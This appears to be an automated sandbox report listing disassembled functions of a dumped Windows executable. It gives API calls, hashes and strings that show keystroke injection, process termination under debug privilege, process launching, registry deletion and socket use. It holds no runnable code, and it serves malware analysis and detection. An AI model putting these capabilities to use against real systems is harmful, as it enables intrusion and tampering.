              • Opcode ID: 7b1aa37183cb670320bf26521c6f8b6fb8439874b305cfc27d84d709d70f8e36
              • Instruction ID: c9526eb38ae211894b24340aecf7208e08b73faaa66416971b69b7333ce9287d
              • Opcode Fuzzy Hash: 7b1aa37183cb670320bf26521c6f8b6fb8439874b305cfc27d84d709d70f8e36
              • Instruction Fuzzy Hash: CB91CF70A00219ABDF24EFA5C848FBEB7B8EF55724F10815AF615EB290D7709945CFA0
              APIs
              • EnumChildWindows.USER32(?,001DAA64), ref: 001DA9A2
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ChildEnumWindows
              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
              • API String ID: 3555792229-1603158881
              • Opcode ID: 870fd063adca28337942c0e8a4ececc69622f0c2f01a88e53a62c9ebc86871be
              • Instruction ID: f5e151662584ed87aed3a2517624c7bf3cacbdb06ebbf585591e69c43a81b0f3
              • Opcode Fuzzy Hash: 870fd063adca28337942c0e8a4ececc69622f0c2f01a88e53a62c9ebc86871be
              • Instruction Fuzzy Hash: 5091DA71A00606EBDB0CDFB0C491BE9FB75FF15314F90811AE999A7241DF30AA99CB91
              APIs
              • SetWindowLongW.USER32(?,000000EB), ref: 00182EAE
                • Part of subcall function 00181DB3: GetClientRect.USER32(?,?), ref: 00181DDC
                • Part of subcall function 00181DB3: GetWindowRect.USER32(?,?), ref: 00181E1D
                • Part of subcall function 00181DB3: ScreenToClient.USER32(?,?), ref: 00181E45
              • GetDC.USER32 ref: 001BCF82
              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001BCF95
              • SelectObject.GDI32(00000000,00000000), ref: 001BCFA3
              • SelectObject.GDI32(00000000,00000000), ref: 001BCFB8
              • ReleaseDC.USER32(?,00000000), ref: 001BCFC0
              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001BD04B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
              • String ID: U
              • API String ID: 4009187628-3372436214
              • Opcode ID: 04b8025b7d9e9ce4fd98dc5a627bb5254040bb97575413685a7f995eacc61959
              • Instruction ID: 7bdb64482d51a0eb0fd4e03759fc58463fc169add2f8d6ec2c84860d51c4f3ce
              • Opcode Fuzzy Hash: 04b8025b7d9e9ce4fd98dc5a627bb5254040bb97575413685a7f995eacc61959
              • Instruction Fuzzy Hash: C271E230500209DFCF29AF64D884AFA7BB6FF49320F1442AAFD555A1A6D7318D41DF61
              APIs
              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0020F910), ref: 001F903D
              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0020F910), ref: 001F9071
              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001F91EB
              • SysFreeString.OLEAUT32(?), ref: 001F9215
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: Free$FileLibraryModuleNamePathQueryStringType
              • String ID:
              • API String ID: 560350794-0
              • Opcode ID: c74f3f738900e2fc858e6592d1be70bdba270565b491894dee2f01044193b18e
              • Instruction ID: 193f4935ef7258aa61ac32ae29ad3da56c417b9b146b34bb2f40eb81d2ce81e6
              • Opcode Fuzzy Hash: c74f3f738900e2fc858e6592d1be70bdba270565b491894dee2f01044193b18e
              • Instruction Fuzzy Hash: 6AF10B71A00209EFDB14EFA4C888EBEB7B9FF89314F148459F615AB251DB31AE45CB50
              APIs
              • _memset.LIBCMT ref: 001FF9C9
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001FFB5C
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001FFB80
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001FFBC0
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001FFBE2
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001FFD5E
              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001FFD90
              • CloseHandle.KERNEL32(?), ref: 001FFDBF
              • CloseHandle.KERNEL32(?), ref: 001FFE36
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
              • String ID:
              • API String ID: 4090791747-0
              • Opcode ID: f066dfa29a4bee7dca6781c0ce8e971a8db28199b156b3459769283901e2c37c
              • Instruction ID: b76f6ab36a66a4bce73907c817737db127c93b430829056281119edc4636eb27
              • Opcode Fuzzy Hash: f066dfa29a4bee7dca6781c0ce8e971a8db28199b156b3459769283901e2c37c
              • Instruction Fuzzy Hash: 91E1C331604345DFCB24EF24C881B7ABBE0AF95354F18846DF9998B2A2DB71DD42CB52
              APIs
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001E38D3,?), ref: 001E48C7
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001E38D3,?), ref: 001E48E0
                • Part of subcall function 001E4CD3: GetFileAttributesW.KERNEL32(?,001E3947), ref: 001E4CD4
              • lstrcmpiW.KERNEL32(?,?), ref: 001E4FE2
              • _wcscmp.LIBCMT ref: 001E4FFC
              • MoveFileW.KERNEL32(?,?), ref: 001E5017
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
              • String ID:
              • API String ID: 793581249-0
              • Opcode ID: 06d36bef7a8ec9f7ff1f3505815807413bdf105a1fed582333a711c1125b27ae
              • Instruction ID: 96928be064184de809af447aa007187e0e1c00cfc500518fd84f6a5d58e41914
              • Opcode Fuzzy Hash: 06d36bef7a8ec9f7ff1f3505815807413bdf105a1fed582333a711c1125b27ae
              • Instruction Fuzzy Hash: 355187B20087859BC764EB95DC819DFB3ECAF95340F10092EF195D3152EF74E6888766
              APIs
              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0020896E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: InvalidateRect
              • String ID:
              • API String ID: 634782764-0
              • Opcode ID: 20776e33533263a3ca83b0a964315d7cde05963a7374135466284938e34ceeb3
              • Instruction ID: 7b66d0cd5cf37509f18ccb071a41389386a2649414aa1601d005ac53adf732aa
              • Opcode Fuzzy Hash: 20776e33533263a3ca83b0a964315d7cde05963a7374135466284938e34ceeb3
              • Instruction Fuzzy Hash: AF51A530620309BBDF319F24DC89B6B7B65BF15310F504112F591E6AE3EF71A9A08B41
              APIs
              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001BC547
              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001BC569
              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001BC581
              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001BC59F
              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001BC5C0
              • DestroyIcon.USER32(00000000), ref: 001BC5CF
              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001BC5EC
              • DestroyIcon.USER32(?), ref: 001BC5FB
                • Part of subcall function 0020A71E: DeleteObject.GDI32(00000000), ref: 0020A757
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
              • String ID:
              • API String ID: 2819616528-0
              • Opcode ID: 597ff29b58ddcd6c45f9b01639cc36f6d1779dc23158553297a96d327d0208cc
              • Instruction ID: c77c6a5b64404e213204716e159c5efd69d2d5f98d22202ee22f640df6b37f9f
              • Opcode Fuzzy Hash: 597ff29b58ddcd6c45f9b01639cc36f6d1779dc23158553297a96d327d0208cc
              • Instruction Fuzzy Hash: E3517A74A40309AFDB25EF24DC49FAA77B5EB59710F104528F902976A0DB70EE90DFA0
              APIs
                • Part of subcall function 001DAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 001DAE77
                • Part of subcall function 001DAE57: GetCurrentThreadId.KERNEL32 ref: 001DAE7E
                • Part of subcall function 001DAE57: AttachThreadInput.USER32(00000000,?,001D9B65,?,00000001), ref: 001DAE85
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001D9B70
              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001D9B8D
              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001D9B90
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001D9B99
              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001D9BB7
              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001D9BBA
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001D9BC3
              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001D9BDA
              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001D9BDD
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
              • String ID:
              • API String ID: 2014098862-0
              • Opcode ID: bfa37de63083ce39e125d686cbda8bb4095a0d205004e33d0b0e3a2edfde481e
              • Instruction ID: 333719f5cd2572f494608f7aa04ba9003c7998c10c3db9da3726fd990fe17420
              • Opcode Fuzzy Hash: bfa37de63083ce39e125d686cbda8bb4095a0d205004e33d0b0e3a2edfde481e
              • Instruction Fuzzy Hash: 50112171580318BEF6206B20EC8DF6A7B2CEF0C751F110426F258AB5A1CAF36C10DAA0
              APIs
              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,001D8A84,00000B00,?,?), ref: 001D8E0C
              • HeapAlloc.KERNEL32(00000000,?,001D8A84,00000B00,?,?), ref: 001D8E13
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001D8A84,00000B00,?,?), ref: 001D8E28
              • GetCurrentProcess.KERNEL32(?,00000000,?,001D8A84,00000B00,?,?), ref: 001D8E30
              • DuplicateHandle.KERNEL32(00000000,?,001D8A84,00000B00,?,?), ref: 001D8E33
              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,001D8A84,00000B00,?,?), ref: 001D8E43
              • GetCurrentProcess.KERNEL32(001D8A84,00000000,?,001D8A84,00000B00,?,?), ref: 001D8E4B
              • DuplicateHandle.KERNEL32(00000000,?,001D8A84,00000B00,?,?), ref: 001D8E4E
              • CreateThread.KERNEL32(00000000,00000000,001D8E74,00000000,00000000,00000000), ref: 001D8E68
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
              • String ID:
              • API String ID: 1957940570-0
              • Opcode ID: d0a79bf7148ba1f10dbdecc5b2d7e73398ae2a3f4a1a1608bad6ac0628de15eb
              • Instruction ID: bf74f8e6ff7745b88b0f4e1c8b06ef37b07d1c9704fad314e481e26dfaef49ea
              • Opcode Fuzzy Hash: d0a79bf7148ba1f10dbdecc5b2d7e73398ae2a3f4a1a1608bad6ac0628de15eb
              • Instruction Fuzzy Hash: C701AC75280304FFE660AB65ED4DF577B6CEB89711F004421FA09DB591CA7098008A20
              APIs
                • Part of subcall function 001D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?,?,001D799D), ref: 001D766F
                • Part of subcall function 001D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D768A
                • Part of subcall function 001D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D7698
                • Part of subcall function 001D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?), ref: 001D76A8
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 001F9B1B
              • _memset.LIBCMT ref: 001F9B28
              • _memset.LIBCMT ref: 001F9C6B
              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 001F9C97
              • CoTaskMemFree.OLE32(?), ref: 001F9CA2
              Strings
              • NULL Pointer assignment, xrefs: 001F9CF0
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
              • String ID: NULL Pointer assignment
              • API String ID: 1300414916-2785691316
              • Opcode ID: 7ddb5a3b1245e50b7a8c312b5ef18439434234fb6fac64660106477bfff1cf05
              • Instruction ID: d0fc86773e9b8615fe36ba8317bc51241ec9e95c0979e758d8e36e42d68e03f2
              • Opcode Fuzzy Hash: 7ddb5a3b1245e50b7a8c312b5ef18439434234fb6fac64660106477bfff1cf05
              • Instruction Fuzzy Hash: A6913971D0021DABDB10EFA4DC84EEEBBB9EF18710F20415AF519A7281DB319A44CFA0
              APIs
              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00207093
              • SendMessageW.USER32(?,00001036,00000000,?), ref: 002070A7
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002070C1
              • _wcscat.LIBCMT ref: 0020711C
              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00207133
              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00207161
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: MessageSend$Window_wcscat
              • String ID: SysListView32
              • API String ID: 307300125-78025650
              • Opcode ID: d0a085a79afa2e87f7a50b1de10c01c2517a34c5ac50d8fa28256c6e9ce362e6
              • Instruction ID: 61ffefb89c9d3023f0748f5a2397d13dced32166338d058e945bc52fec17b5fa
              • Opcode Fuzzy Hash: d0a085a79afa2e87f7a50b1de10c01c2517a34c5ac50d8fa28256c6e9ce362e6
              • Instruction Fuzzy Hash: A841D371954309AFEB219F64CC89BEEB7A9EF08350F10052AF544E71D2D772AD948B60
              APIs
                • Part of subcall function 001E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 001E3EB6
                • Part of subcall function 001E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 001E3EC4
                • Part of subcall function 001E3E91: CloseHandle.KERNEL32(00000000), ref: 001E3F8E
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FECB8
              • GetLastError.KERNEL32 ref: 001FECCB
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001FECFA
              • TerminateProcess.KERNEL32(00000000,00000000), ref: 001FED77
              • GetLastError.KERNEL32(00000000), ref: 001FED82
              • CloseHandle.KERNEL32(00000000), ref: 001FEDB7
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
              • String ID: SeDebugPrivilege
              • API String ID: 2533919879-2896544425
              • Opcode ID: 6937b972b80abe17cd055fcdf0dede8fc5b9a8f596aa481126d1384178e6ea30
              • Instruction ID: 8454dbd57bc57af80762a892e3c3e7183288eb342383f8f4cdfa440d4955212b
              • Opcode Fuzzy Hash: 6937b972b80abe17cd055fcdf0dede8fc5b9a8f596aa481126d1384178e6ea30
              • Instruction Fuzzy Hash: 6141BE712002059FDB24EF64CC95F7EB7E1AF90714F088059FA469B3D2DB75A904CB91
              APIs
              • LoadIconW.USER32(00000000,00007F03), ref: 001E32C5
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: IconLoad
              • String ID: blank$info$question$stop$warning
              • API String ID: 2457776203-404129466
              • Opcode ID: 774b0f4636aaf3fa2c7bcc9e512bf900fbd397adc288183c4150e54efcd9718e
              • Instruction ID: 57bedcafe459066074e597f3de5b6ee6477de09ef4860600de99be2ace64262c
              • Opcode Fuzzy Hash: 774b0f4636aaf3fa2c7bcc9e512bf900fbd397adc288183c4150e54efcd9718e
              • Instruction Fuzzy Hash: D61157356087C7BAE7055A56DC47D6FB39CDF2A370F20002AFAA0A7181E7A19B0006B5
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001E454E
              • LoadStringW.USER32(00000000), ref: 001E4555
              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001E456B
              • LoadStringW.USER32(00000000), ref: 001E4572
              • _wprintf.LIBCMT ref: 001E4598
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001E45B6
              Strings
              • %s (%d) : ==> %s: %s %s, xrefs: 001E4593
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: HandleLoadModuleString$Message_wprintf
              • String ID: %s (%d) : ==> %s: %s %s
              • API String ID: 3648134473-3128320259
              • Opcode ID: 5b456718e279cee2939cb07a5d06d8dbe4a9dd74d4f00909334a9708df48349f
              • Instruction ID: b181f0f1e7ac1c7dc54347e46ff6cd2befe4c5f568c3880e23fc27f932ab69fb
              • Opcode Fuzzy Hash: 5b456718e279cee2939cb07a5d06d8dbe4a9dd74d4f00909334a9708df48349f
              • Instruction Fuzzy Hash: 210144F6940308BFE760D7949E89EEB776CDB08301F0005A5B759D2452EA755E854B70
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • GetSystemMetrics.USER32(0000000F), ref: 0020D78A
              • GetSystemMetrics.USER32(0000000F), ref: 0020D7AA
              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0020D9E5
              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0020DA03
              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0020DA24
              • ShowWindow.USER32(00000003,00000000), ref: 0020DA43
              • InvalidateRect.USER32(?,00000000,00000001), ref: 0020DA68
              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0020DA8B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
              • String ID:
              • API String ID: 1211466189-0
              • Opcode ID: c45cb2309676b1601288ccee0995c97d468ece8b555fa94370eb1223f0b64dc1
              • Instruction ID: a5856079a3ec379c4f212119d19f3bbe8401de634e03a7c6924a17f450eba9c6
              • Opcode Fuzzy Hash: c45cb2309676b1601288ccee0995c97d468ece8b555fa94370eb1223f0b64dc1
              • Instruction Fuzzy Hash: CDB1897560132AEFDF14CFA8C9897AE7BB1BF44701F088069EC489B696D734A960CB50
              APIs
              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000), ref: 00182ACF
              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00182B17
              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000), ref: 001BC46A
              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000), ref: 001BC4D6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              Similarity
              • API ID: ShowWindow
              • String ID:
              • API String ID: 1268545403-0
              • Opcode ID: 6796572a9206189177c8a4480b2aba4b4e455df5724616476f2becf0a0dbc4bb
              • Instruction ID: 24c97eb1f86a142c152f0ecc75ab3d8f6624772a857456b518998e8111f436ad
              • Opcode Fuzzy Hash: 6796572a9206189177c8a4480b2aba4b4e455df5724616476f2becf0a0dbc4bb
              • Instruction Fuzzy Hash: 3C413934204780AAC73FAB28DD9CBBB7B92AF96300F15881DE05787D61C7759A41CF51
              APIs
              • InterlockedExchange.KERNEL32(?,000001F5), ref: 001E737F
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001E73B6
              • EnterCriticalSection.KERNEL32(?), ref: 001E73D2
              • _memmove.LIBCMT ref: 001E7420
              • _memmove.LIBCMT ref: 001E743D
              • LeaveCriticalSection.KERNEL32(?), ref: 001E744C
              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001E7461
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 001E7480
              Similarity
              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
              • String ID:
              • API String ID: 256516436-0
              APIs
              • DeleteObject.GDI32(00000000), ref: 0020645A
              • GetDC.USER32(00000000), ref: 00206462
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0020646D
              • ReleaseDC.USER32(00000000,00000000), ref: 00206479
              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002064B5
              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002064C6
              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00209299,?,?,000000FF,00000000,?,000000FF,?), ref: 00206500
              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00206520
              Similarity
              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
              • String ID:
              • API String ID: 3864802216-0
              APIs
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
              • _wcstok.LIBCMT ref: 001EEEFF
              • _wcscpy.LIBCMT ref: 001EEF8E
              • _memset.LIBCMT ref: 001EEFC1
              Similarity
              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
              • String ID: X
              • API String ID: 774024439-3081909835
              APIs
              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001F6F14
              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001F6F35
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6F48
              • htons.WSOCK32(?,?,?,00000000,?), ref: 001F6FFE
              • inet_ntoa.WSOCK32(?), ref: 001F6FBB
                • Part of subcall function 001DAE14: _strlen.LIBCMT ref: 001DAE1E
                • Part of subcall function 001DAE14: _memmove.LIBCMT ref: 001DAE40
              • _strlen.LIBCMT ref: 001F7058
              • _memmove.LIBCMT ref: 001F70C1
              Similarity
              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
              • String ID:
              • API String ID: 3619996494-0
              APIs
              • IsWindow.USER32(014260A8), ref: 0020B6A5
              • IsWindowEnabled.USER32(014260A8), ref: 0020B6B1
              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0020B795
              • SendMessageW.USER32(014260A8,000000B0,?,?), ref: 0020B7CC
              • IsDlgButtonChecked.USER32(?,?), ref: 0020B809
              • GetWindowLongW.USER32(014260A8,000000EC), ref: 0020B82B
              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0020B843
              Similarity
              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
              • String ID:
              • API String ID: 4072528602-0
              APIs
              • _memset.LIBCMT ref: 001FF75C
              • _memset.LIBCMT ref: 001FF825
              • ShellExecuteExW.SHELL32(?), ref: 001FF86A
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
              • GetProcessId.KERNEL32(00000000), ref: 001FF8E1
              • CloseHandle.KERNEL32(00000000), ref: 001FF910
              Similarity
              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
              • String ID: @
              • API String ID: 3522835683-2766056989
              APIs
              • GetParent.USER32(?), ref: 001E149C
              • GetKeyboardState.USER32(?), ref: 001E14B1
              • SetKeyboardState.USER32(?), ref: 001E1512
              • PostMessageW.USER32(?,00000101,00000010,?), ref: 001E1540
              • PostMessageW.USER32(?,00000101,00000011,?), ref: 001E155F
              • PostMessageW.USER32(?,00000101,00000012,?), ref: 001E15A5
              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001E15C8
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              APIs
              • GetParent.USER32(00000000), ref: 001E12B5
              • GetKeyboardState.USER32(?), ref: 001E12CA
              • SetKeyboardState.USER32(?), ref: 001E132B
              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001E1357
              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001E1374
              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001E13B8
              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001E13D9
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              APIs
              Similarity
              • API ID: _wcsncpy$LocalTime
              • String ID:
              • API String ID: 2945705084-0
              APIs
              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001DDAC5
              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001DDAFB
              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001DDB0C
              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001DDB8E
              Similarity
              • API ID: ErrorMode$AddressCreateInstanceProc
              • String ID: ,,!$DllGetClassObject
              • API String ID: 753597075-108149451
              APIs
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001E38D3,?), ref: 001E48C7
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001E38D3,?), ref: 001E48E0
              • lstrcmpiW.KERNEL32(?,?), ref: 001E38F3
              • _wcscmp.LIBCMT ref: 001E390F
              • MoveFileW.KERNEL32(?,?), ref: 001E3927
              • _wcscat.LIBCMT ref: 001E396F
              • SHFileOperationW.SHELL32(?), ref: 001E39DB
              Similarity
              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
              • String ID: \*.*
              • API String ID: 1377345388-1173974218
              APIs
              • _memset.LIBCMT ref: 00207519
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002075C0
              • IsMenu.USER32(?), ref: 002075D8
              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00207620
              • DrawMenuBar.USER32 ref: 00207633
              Similarity
              • API ID: Menu$Item$DrawInfoInsert_memset
              • String ID: 0
              • API String ID: 3866635326-4108050209
              APIs
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0020125C
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00201286
              • FreeLibrary.KERNEL32(00000000), ref: 0020133D
                • Part of subcall function 0020122D: RegCloseKey.ADVAPI32(?), ref: 002012A3
                • Part of subcall function 0020122D: FreeLibrary.KERNEL32(?), ref: 002012F5
                • Part of subcall function 0020122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00201318
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 002012E0
              Similarity
              • API ID: EnumFreeLibrary$CloseDeleteOpen
              • String ID:
              • API String ID: 395352322-0
              APIs
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0020655B
